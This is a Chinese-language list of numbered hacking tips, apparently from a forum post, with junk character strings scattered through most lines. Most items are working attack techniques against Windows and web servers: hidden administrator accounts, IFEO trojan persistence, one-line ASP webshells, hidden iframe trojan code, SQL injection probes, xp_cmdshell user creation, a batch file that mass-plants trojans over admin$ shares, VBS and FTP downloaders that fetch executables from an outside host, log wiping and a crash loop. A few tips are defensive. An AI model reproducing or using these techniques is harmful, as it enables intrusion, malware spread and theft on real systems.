Xp系统修改权限防止病毒或木马等破坏系统,cmd下,! a8 I; @0 o) n, m# W
cacls C:\windows\system32 /G hqw20:R H5 E6 u- P; ~& g; E
思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入3 K- @' W( D6 i, W5 \
恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F
% G7 V. _4 X) s( R8 {2 S1 I. L3 Q; B4 }0 R8 `
2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。
) p- X8 F6 K' b) u! W: h3 {, k8 }% R
3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。& ^) X& O5 J5 C$ V. l/ ^$ L
# S: C* c4 W0 s4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号/ |& K8 G3 D# A" C6 p9 i
: p6 e% C( I% H' i5、利用INF文件来修改注册表3 [( l @0 g) z; ]- `8 k0 B" w
[Version]1 Q1 L8 n. g8 g; d6 v
Signature="$CHICAGO$"/ `; W# ~/ a# n) b
[Defaultinstall]- U X6 p* B3 z# W
addREG=Ating
2 r X) o( c& ?+ x[Ating]
' v6 F# P6 p" i: s, \ JHKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"
N) M$ ~" y9 e6 A以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:0 p, U6 V# G- v9 C" f, m* s
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径
X4 u6 C* W) C4 [8 X其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU7 u2 J) \* g0 `
HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU
4 T$ n* r/ E! g- dHKEY_CURRENT_CONFIG 简写为 HKCC
0 W2 |8 m$ c6 ]+ U2 A0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值, U2 @8 r \7 B% v7 s8 H; A
"1"这里代表是写入或删除注册表键值中的具体数据9 F& H9 f: t) H! A- `# Q. r
k1 c& h$ I1 _3 g
6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,
! o& I' d; V7 E E多了一步就是在防火墙里添加个端口,然后导出其键值4 O$ _ o) G* V: N0 Z
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
0 _ G2 y7 Q8 W% k }$ D3 W& I D* P$ u& D7 u
7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽0 d/ o" A) B- w0 \2 q! p
在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。( w( a1 A! o/ C' M7 {5 i2 T/ ~
! [/ N0 ^2 ?* U J6 u5 d6 t$ x8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。
; e2 ` R5 }2 C# y0 P. [
+ i! A" n$ n8 p; y9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,( x% L# j1 o* F0 G6 K7 N) l9 _- D
可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。
) W5 I1 P8 W! |' [# G4 |
3 o5 {; v, n `6 f: ?( L10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”( P) C8 @5 _7 V3 N! X/ ^
6 R. U; G4 j ^1 B& Z+ k11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,2 n+ @: j) ~% O/ u; h! ~
用法:xsniff –pass –hide –log pass.txt. ?; R) O6 x& B8 }6 T3 r' i
' ^* H$ P. k4 \# Y; j( x12、google搜索的艺术4 a2 J( S2 `1 h/ [ K) G. _
搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
& O4 O$ A6 x- N/ K或“字符串的语法错误”可以找到很多sql注入漏洞。2 O& j8 `6 @9 p
; x, G9 K5 O5 t# d3 X13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。
4 H7 U, D) f# q1 H& S; m: ]# v+ b$ P/ l$ B% h
14、cmd中输入 nc –vv –l –p 1987, N9 [8 A- ^6 d' L0 S" m6 ?
做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃: Z3 ~, C& b3 P* i
; k3 w. t( u, g' a1 q" J G% x/ ~15、制作T++木马,先写个ating.hta文件,内容为
$ G: C2 U. ?! e3 c. `/ t3 a9 f<script language="VBScript">
}' r3 E* L% T5 X, \9 \: lset wshshell=createobject ("wscript.shell" )0 Y# ^2 I8 |/ E, W0 q: {
a=wshshell.run("你马的名称",1)
! X- M% U' _6 k% z4 t3 h/ Vwindow.close' j) l3 I4 c8 c; A
</script>
( ]. |% ~# D3 f9 |2 |( \1 Z# m再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。: z9 J& Y% q/ e1 m4 Z
8 H# G- l0 F, M16、搜索栏里输入5 y: H# w5 J5 d% y8 i% W0 q8 `
关键字%'and 1=1 and '%'='1 m% _! `" n) o* F( b: F1 p! `
关键字%'and 1=2 and '%'='
$ I6 y/ a5 ?. Z. R. L比较不同处 可以作为注入的特征字符4 F0 D D% Q/ J$ b& a; Z* z
. Z: V- V& f A1 ^' K17、挂马代码<html>! r$ p1 u, e( g+ s3 ^: i' g. j. V) |5 P
<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>
# Q) h% i% k" g$ Y8 }, z</html>
, Z" J I( h, a) {# A
: D$ g. E% B# Z# h# h% x F18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,
9 U( N% U4 u! n9 o2 K+ Y( Bnet localgroup administrators还是可以看出Guest是管理员来。1 C' c$ V- N& W/ J
) Z) [% v, R3 |9 t
19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等: T+ N% ?1 c0 R/ t6 S$ V
用法: 安装: instsrv.exe 服务名称 路径3 |* h3 x; c$ D
卸载: instsrv.exe 服务名称 REMOVE' k" l/ L: p( q; U) \
6 C7 {" b% i" x5 {9 _: F9 ? J
3 T) ^8 p% s2 N' V$ b9 e21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉
. a. q5 T; u, Z$ J8 }4 [3 _8 \6 U不能注入时要第一时间想到%5c暴库。
' S& P$ M$ r. M+ u" Q6 v* B, B3 u0 ~
22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~
0 y3 G4 g" f V; r Y( x. W4 Y
9 g. R) X5 ]5 p; c! E23、缺少xp_cmdshell时6 {+ j7 u6 Z( N0 @
尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
5 |$ X% k& d/ w7 J2 k, Q( o; p假如恢复不成功,可以尝试直接加用户(针对开3389的)* M9 v/ \. i, J4 D+ X- K
declare @o int+ M' G( I) U1 E! o8 r) w9 ]
exec sp_oacreate 'wscript.shell',@o out
0 F( q( I; n3 hexec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员5 \# q+ g6 N9 p5 }
$ l9 U9 Z( c/ H% S
24.批量种植木马.bat& U; K$ o; a: B# g: `6 G' V
for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中
7 ?- e5 `4 T1 X7 h& F- H8 h) s `for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间
2 D' T Z- f( n: e; f扫描地址.txt里每个主机名一行 用\\开头$ A. K+ w: s* E. l: l B1 C; p* J
0 k, N) l" A- @& h% p: k
25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。3 {' Q0 V+ G3 d9 e0 ]1 C. `
0 x1 k7 g% h/ O& C7 X
26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.# r' w* y2 o% ^$ t
将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.2 ~1 m }" d$ j+ J, s
.cer 等后缀的文件夹下都可以运行任何后缀的asp木马9 [0 E6 k) j/ B: c
3 u5 ?5 [4 z c7 F& _7 \27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP% H* q3 w( H, {$ s2 C/ N
然后用#clear logg和#clear line vty *删除日志' h3 M9 k5 F* [- {% |/ {" z' Q; R3 t
& b& B( [% K1 b4 |
28、电脑坏了省去重新安装系统的方法) U/ C* [) K, P* m
纯dos下执行,0 e3 z3 k' r; Y4 g% J, i
xp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config
, m6 k# v: R1 |( {, E2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config# C( K$ `1 _* ?& G
: q7 g, t/ M! R0 ^) t) N
29、解决TCP/IP筛选 在注册表里有三处,分别是:
% E* C/ f1 n1 s4 q- aHKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
9 a f2 g9 l3 r3 MHKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
; |9 K) b! e( u' D% m0 P0 y$ |/ UHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip% q( ]! R4 o' G+ Z g+ p# z+ t( D. v
分别用% }- U+ z0 s2 w$ h8 ~; f7 _' O
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
7 H7 N$ |) N( o5 X1 Gregedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip2 P- `6 T/ Z4 c
regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip; U9 C2 s! t# K0 o$ ^5 l5 R
命令来导出注册表项! `, ^) p) a) {
然后把三个文件里的EnableSecurityFilters"=dword:00000001,9 V( V1 T- ]5 Y( U, Z, s, ?4 t
改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用
1 h: ~- L# z) D( H: A$ dregedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。; i; V6 W0 Y& C) o, ]+ m D* \
" r+ I ^' ~. }0 E
30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U+ i) B! Y. B2 O& T! ~; b. \) \9 p
SER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3
$ s2 Y, y `+ ]& b# `2 k' i B2 w/ o. m; b' s
31、全手工打造开3389工具
4 k g2 G2 m) [& ~1 _0 {: k打开记事本,编辑内容如下:! @& z4 V* E9 F1 a2 P
echo [Components] > c:\sql0 x7 u7 C2 E) K! [
echo TSEnable = on >> c:\sql4 Z n6 o& t6 P% D+ T: A& X. C9 I
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q& }+ U1 Y3 m/ e6 ^: S# S
编辑好后存为BAT文件,上传至肉鸡,执行* m: Z+ V8 b/ b8 J9 m7 G* d
+ \* G9 @1 O. B. c32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马
+ C) a/ ~- [+ G {3 o: h. F7 l- n R6 N( W L {
33、让服务器重启 E6 V! P) {; _1 X+ {; o
写个bat死循环:
2 W* T' k" o; q9 o@echo off
0 ]) e" m' C% |2 I:loop1
, w, t$ W" N7 \3 Z. `- Pcls; h% l- Y. T. c) A* Q4 x# j, ?% P
start cmd.exe
- _" J {; l. S* F7 J% j- fgoto loop1
/ e+ Y3 S. u4 B保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启
' w. v5 y& N! k4 ?
# m! M4 K2 u; R h7 J2 }34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,
% _/ J3 L* w/ { j1 N@echo off$ c( `" F+ X0 [! F
date /t >c:/3389.txt
0 P4 o- e( Y( J! f8 T9 e0 }time /t >>c:/3389.txt; U. a- o+ X1 ^( Z' C
attrib +s +h c:/3389.bat' I" b3 G' u+ F( C1 b. g
attrib +s +h c:/3389.txt# v5 h4 g( M! C0 C# C
netstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt
& ?0 f+ b( r) B5 @7 k0 e并保存为3389.bat
9 X+ I; P: v' d! ~5 x打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号
# h* J3 ~% U) a/ |) Z! S* c {/ z6 K1 a
3 l" |3 | I9 T# G0 E, V' f y35、有时候提不了权限的话,试试这个命令,在命令行里输入:
: \, O% H$ n4 w$ n, @start http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)- |. x$ _) b) l4 [
输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。
9 I: U$ G. t1 d' E+ ?6 Z6 j% u
! _" b1 Y. B" V# |9 l: n" j36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件
; H+ d' \2 H9 hecho open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址: q- N" P/ S% X& G5 r P4 V
echo 你的FTP账号 >>c:\1.bat //输入账号
2 j) z- J% ^9 Z( Y' Iecho 你的FTP密码 >>c:\1.bat //输入密码. O6 K3 d z4 L1 Z* t
echo bin >>c:\1.bat //登入
. r+ H. o8 C' u# H0 A+ T, |' Mecho get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么# w; p$ `. B1 u! g
echo bye >>c:\1.bat //退出' O- Y: J& A7 |0 m0 N
然后执行ftp -s:c:\1.bat即可
& b6 K% d8 v5 |5 d0 x, E$ k& N7 Q% w0 ?, M
37、修改注册表开3389两法
& ]. Q8 C5 k; R; a(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表* Y% B+ O0 f3 J+ Y' c
echo Windows Registry Editor Version 5.00 >>3389.reg
4 N. |9 d0 _/ P) p6 Q4 Z) Lecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
- V( D$ _. O( j% z8 ~3 f, P" cecho "Enabled"="0" >>3389.reg P5 b9 k! I' I
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows7 ?0 ]* U& G& x+ Q
NT\CurrentVersion\Winlogon] >>3389.reg
2 @# g/ ^* o+ }8 Vecho "ShutdownWithoutLogon"="0" >>3389.reg
( {- E9 b; V" o4 z# kecho [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
( f1 N) ~% z8 Y, k: f2 O>>3389.reg2 c" o) \7 Y# Y: ^/ i( C) P, H
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg
8 G- x) x* s5 l4 Decho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
, L# g, h, g4 N" z3 [$ V>>3389.reg6 L0 V: l) n! l( m8 l
echo "TSEnabled"=dword:00000001 >>3389.reg4 V. L# @5 t# G& c4 z
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg5 J- {# C ?! d" ]6 v& T
echo "Start"=dword:00000002 >>3389.reg0 P/ ~( }& A2 a1 N2 A' \
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
! v- O Z; S4 r. C>>3389.reg* v( W) F- `$ O7 k9 L7 q, z
echo "Start"=dword:00000002 >>3389.reg
! j8 T* [$ q6 secho [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg
2 y: [1 ]7 Q6 P9 }# u/ P( Uecho "Hotkey"="1" >>3389.reg
! r7 u: a, H5 K4 {3 v+ W# aecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
( ^# V7 S* a! Q: _0 ~% i, ZServer\Wds\rdpwd\Tds\tcp] >>3389.reg- A' z( c6 l1 b5 G
echo "PortNumber"=dword:00000D3D >>3389.reg: t; e3 \; F7 `' [$ M e
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal( ^! a6 @& }% V& i
Server\WinStations\RDP-Tcp] >>3389.reg
. i2 K2 D& R& y9 \echo "PortNumber"=dword:00000D3D >>3389.reg
V2 N* d+ D3 D0 @6 R& d0 M+ m' D把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。
+ j% _+ A# z* C$ z7 B(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
E3 {; a" `+ I! |因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效5 ^+ n- k2 ^. G4 `
(2)winxp和win2003终端开启
" ~$ z# @/ X6 i( `8 y用以下ECHO代码写一个REG文件:' x r) D6 ~7 ]+ e, e f, D
echo Windows Registry Editor Version 5.00>>3389.reg
0 j. H: |6 @! G+ becho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal5 C; l% Z6 x) ^: m# k/ W* K
Server]>>3389.reg
- t' h4 t" E% D% L9 r0 [* p) gecho "fDenyTSConnections"=dword:00000000>>3389.reg
( n) i3 ?9 c$ Gecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal7 E: ?- T: s2 N/ v7 `9 o
Server\Wds\rdpwd\Tds\tcp]>>3389.reg. l' i6 x2 l( O
echo "PortNumber"=dword:00000d3d>>3389.reg+ \& j: f5 T1 o7 n+ Q7 m! \
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
5 h E* I2 Z, C% mServer\WinStations\RDP-Tcp]>>3389.reg. w' b8 e1 B" w; L" P) x
echo "PortNumber"=dword:00000d3d>>3389.reg
7 G. p; d. M$ n$ E4 H& q' g- @; `然后regedit /s 3389.reg del 3389.reg
7 i, m% r7 N" p/ t# PXP下不论开终端还是改终端端口都不需重启+ X" ]' z! o/ c1 M# v
( L! a6 @+ O% @/ |9 T- M
38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃; x' m. b9 g. J. ~4 v
用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'; L8 X3 |1 Z4 G$ u. g: C
( g8 p" y8 j: K39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!7 X( u$ I% H y6 I4 v+ D
(1)数据库文件名应复杂并要有特殊字符
# k+ z; V0 }$ V# m9 X(2)不要把数据库名称写在conn.asp里,要用ODBC数据源" ?8 ^; M6 U# ?: {: F
将conn.asp文档中的% t1 M/ Q. Z) {" Q
DBPath = Server.MapPath("数据库.mdb")! m1 h# v) u7 A! D( `
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath
4 h+ U% v% b# H' I3 A: \6 l
# H$ I( o7 _5 K, K* \7 }: V& E修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置. n5 Z' t ]9 Y2 f
(3)不放在WEB目录里
) W6 }9 i" B* H) I' o- I/ m( M4 n: X
40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉, T4 D1 v- Y7 T; M
可以写两个bat文件( l# E# M/ [+ b' c7 W) Z
@echo off% |9 `. u) B2 C" j( z" D- ?
@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe
) d1 Z: [- K/ x; v' _7 {@del c:\winnt\system32\query.exe
+ M0 g" T3 {9 C7 F" w+ T& f. j@del %SYSTEMROOT%\system32\dllcache\query.exe
: P& L" ~; ^! o2 k" x# K2 x# f@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的
0 D& A) t9 v2 n& C
$ Q& d+ Z2 _) g/ I8 l@echo off/ l8 ^& h1 w7 F( @9 V1 r
@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe% I2 `) Z9 Q& Z
@del c:\winnt\system32\tsadmin.exe# E% V% P' W. ^5 b5 t
@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex
; b( ~" e2 ]' v: K3 w& s0 l: U0 J- ~0 A U% ~
41、映射对方盘符1 u, r1 B7 E1 m# \& n6 V; l1 m
telnet到他的机器上,
+ [/ K' R9 B$ q$ v& S& Z$ @1 B; F' Inet share 查看有没有默认共享 如果没有,那么就接着运行1 g3 c# B+ }+ K/ l1 ]
net share c$=c:& p6 I# _% H' _* Z8 H
net share现在有c$
6 D, i& I% v+ w8 V5 `在自己的机器上运行
- W1 P0 I4 u) ?8 c3 knet use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K
; |! m2 d6 z: w# T3 i1 \0 v1 T- X: X& }, l
42、一些很有用的老知识
- ^# B0 |: u9 c$ Rtype c:\boot.ini ( 查看系统版本 )
. j+ a( q- T6 p: Gnet start (查看已经启动的服务)
+ n# h9 b w3 H/ y7 i0 K! ]& Pquery user ( 查看当前终端连接 )
+ P# k* W$ Y8 j9 C( w8 V6 Lnet user ( 查看当前用户 )' Z. ]3 T) L+ ?7 ^8 o! J. h
net user 用户 密码/add ( 建立账号 )4 M J& K3 \% j1 G9 } C
net localgroup administrators 用户 /add (提升某用户为管理员)
|8 r" I/ G/ I5 D4 \0 n& Z3 Y/ ]ipconfig -all ( 查看IP什么的 )
/ r& K! f& Y" Snetstat -an ( 查看当前网络状态 )
. l8 h3 B3 p& \) U5 U* A- pfindpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
; n0 `8 {# X, h2 g9 ^( `# _+ p, j T# c克隆时Administrator对应1F4
+ |* H$ V$ ?+ |/ o7 Xguest对应1F5
$ I0 I) U" b- y3 Z: a) t* ctsinternetuser对应3E8* h; S+ Y& H* r/ a
& j; U X r' a* z0 y( a. F43、如果对方没开3389,但是装了Remote Administrator Service
2 ^$ F% l7 X7 u5 `6 v6 o) u用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接
' X2 }2 Q0 X9 k) I$ T6 f$ ~+ j$ @解释:用serv-u漏洞导入自己配制好的radmin的注册表信息6 ]( ]& F# X; F
先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"
) x/ P+ v/ g( z9 Q3 @% T0 q% d' Y% v" a7 B5 Y! q1 B2 H4 i8 z. ]
44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)# ^) X4 Y4 ~ C) p* I$ D: O" l1 {
本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)' x8 C; B5 [+ w$ e: d7 b
1 B+ _8 i' ^. n: d' |. q! P45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)0 C; \! n% h/ A9 ]
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open
3 _) |2 J2 M, x^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =
% @6 |# k, C% K* K$ V: ~8 aCreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type = r% j7 r9 ?* e; B, N
1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs
+ N8 g' ^1 O* C+ Z0 \(这是完整的一句话,其中没有换行符)
: X" m# h" V; m. l1 Q然后下载:
2 B' o! a3 ^. G& @/ s hcscript down.vbs http://www.hack520.org/hack.exe hack.exe
" }# i8 a* F% U! r* r( Q1 l* I( R" k
46、一句话木马成功依赖于两个条件:! }* w' \* X' t/ ]. ?
1、服务端没有禁止adodb.Stream或FSO组件5 \& F" O ~* x" T& x. W
2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。% Z( W; Q) Y0 {: v& y6 {
7 x& E# _' k9 {' P% u$ A; e47、利用DB_OWNER权限进行手工备份一句话木马的代码:
. V; X( p# P( Y0 j6 R;alter database utsz set RECOVERY FULL--
7 i6 T- V2 c# P D;create table cmd (a image)--4 T/ Z9 J# {6 k( R9 s) R7 H
;backup log utsz to disk = 'D:\cmd' with init--. i/ f* F; H# w
;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--
* w6 m0 D% }5 a4 S) a;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--
8 G- }5 J/ ?# W注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。
8 _9 K. j9 J% U
3 e8 i& B3 ~8 `4 L48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:
" f n |) Y& A: \( V+ ?' v+ V! s
用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options
% _' J3 H3 p3 ]# V/ a所有会话用 'all'。
: j/ o, r+ k) v& K-s sessionid 列出会话的信息。2 {& }& l, J. [. _
-k sessionid 终止会话。! s _3 }" \, t3 s f0 ^; |
-m sessionid 发送消息到会话。
2 F, i0 @1 P0 \6 u# R4 W8 e. h) H( L- I8 {6 _8 }
config 配置 telnet 服务器参数。; t5 T8 M8 G2 c- s* e0 h" A
, a. L9 g* n; q3 j4 a
common_options 为:
; f$ G/ q" O) {3 u. x$ \-u user 指定要使用其凭据的用户 X, O) ?- d2 i. w5 ]3 a9 G
-p password 用户密码# |4 H# i& K6 O% ?4 K% E
1 J$ `2 y' y; a& S5 t
config_options 为:
1 P( G. J W0 W$ U! C- ?dom = domain 设定用户的默认域% e0 P2 d2 f7 k f& i4 h
ctrlakeymap = yes|no 设定 ALT 键的映射" [. D2 R+ m8 O5 [
timeout = hh:mm:ss 设定空闲会话超时值
$ ?" k9 |$ W8 g: u" a$ {& Y6 b1 btimeoutactive = yes|no 启用空闲会话。( {: h( q/ S9 g9 q0 u
maxfail = attempts 设定断开前失败的登录企图数。
) _" {% V1 ^7 g( ]' Q; Nmaxconn = connections 设定最大连接数。( G: v1 g$ o$ \9 d2 V" h
port = number 设定 telnet 端口。
# x/ r$ k( Y( |, Dsec = [+/-]NTLM [+/-]passwd2 ?6 d; e7 ~% R/ G$ G3 J$ |$ s
设定身份验证机构. ?- C( ]. G' y E+ \
fname = file 指定审计文件名。 ^& t+ Q! P1 x, ?: ]( x
fsize = size 指定审计文件的最大尺寸(MB)。
5 Q( \& N( `( M: k- n9 rmode = console|stream 指定操作模式。
7 {+ Q" y1 T1 u! hauditlocation = eventlog|file|both
1 @" I& l; L( M$ X8 q$ S指定记录地点 o+ ^7 X' \5 g7 ^* p/ D/ N
audit = [+/-]user [+/-]fail [+/-]admin) j0 n; S" g5 G! L
4 a) d0 k1 d. P49、例如:在IE上访问:% u1 o; u; d: [/ b/ c7 _
www.hack520.org/hack.txt就会跳转到http://www.hack520.org/" J: g7 {5 z2 s" R+ V
hack.txt里面的代码是:
! l* L2 W, o: J<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">3 }6 o" d0 {0 P! M5 x7 a! a
把这个hack.txt发到你空间就可以了!
3 v+ L: l$ G2 j, m I' N这个可以利用来做网马哦!, N3 \0 j+ A d- R2 Y4 E
. E/ `! H, O* J* s, E* F: y" i/ |
50、autorun的病毒可以通过手动限制!+ u- O! ~: G+ v6 r) j
1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!
/ Q! }6 |$ A! U! |2,打开盘符用右键打开!切忌双击盘符~' Z4 f7 k' r2 R* X8 f' E
3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!
& T" l( l# A$ s7 M# [/ J! w* K( E2 k
51、log备份时的一句话木马:; a! `' t. q# I$ k
a).<%%25Execute(request("go"))%%25>
/ g& w* |, w) g; jb).<%Execute(request("go"))%>8 m* K: \( @ h( l ^2 d
c).%><%execute request("go")%><%
5 g K7 T9 ]& S4 B' Ld).<script language=VBScript runat=server>execute request("sb")</Script>
" M7 c, ?7 j* ?; u1 O$ re).<%25Execute(request("l"))%25>% w* s F8 G X/ n9 O
f).<%if request("cmd")<>"" then execute request("pass")%>
% Y! X- z) a. I1 G( \
4 P0 ^4 B# @" B! z7 m1 I! T52、at "12:17" /interactive cmd
8 h% H( ^, q) P4 S+ n" X; }( T执行后可以用AT命令查看新加的任务
) q L, u3 W; f0 q Y- X0 c: Q7 t用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。
* k* o A$ s/ ?, a& H* b% i1 Q
/ \. s. j8 J# O! x. A, `0 q8 n53、隐藏ASP后门的两种方法" O* A& i( N' J2 n' `* i! k
1、建立非标准目录:mkdir images..\, t, I! z2 N$ O5 V3 `2 |' W; K! T
